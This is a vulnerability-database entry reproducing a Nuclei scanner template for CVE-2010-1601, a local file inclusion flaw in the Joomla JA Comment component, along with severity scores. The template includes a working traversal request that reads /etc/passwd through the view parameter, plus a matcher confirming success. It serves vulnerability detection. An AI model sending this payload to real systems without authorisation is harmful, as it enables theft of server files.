Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1601
HistoryAug 26, 2021 - 2:21 a.m.

Joomla! Component JA Comment - Local File Inclusion

2021-08-2602:21:15
ProjectDiscovery
github.com
6
cve
joomla
lfi
exploit-db
packetstorm
joomlamart

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.6

Confidence

Low

EPSS

0.013

Percentile

85.9%

A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the view parameter to index.php.

id: CVE-2010-1601

info:
  name: Joomla! Component JA Comment - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12236
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1601
    - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57848
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1601
    cwe-id: CWE-22
    epss-score: 0.01299
    epss-percentile: 0.85844
    cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomlamart
    product: com_jacomment
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203a5d4d3c01f9d5de6051deb8eb637e37c43ec48f37b679bea23ad125ef151d5a022031d19b5068b2be4e64980b85a51911c855eeedb0a1a916d75e0bfbcd8c1b94c5:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

6.6

Confidence

Low

EPSS

0.013

Percentile

85.9%

Related for NUCLEI:CVE-2010-1601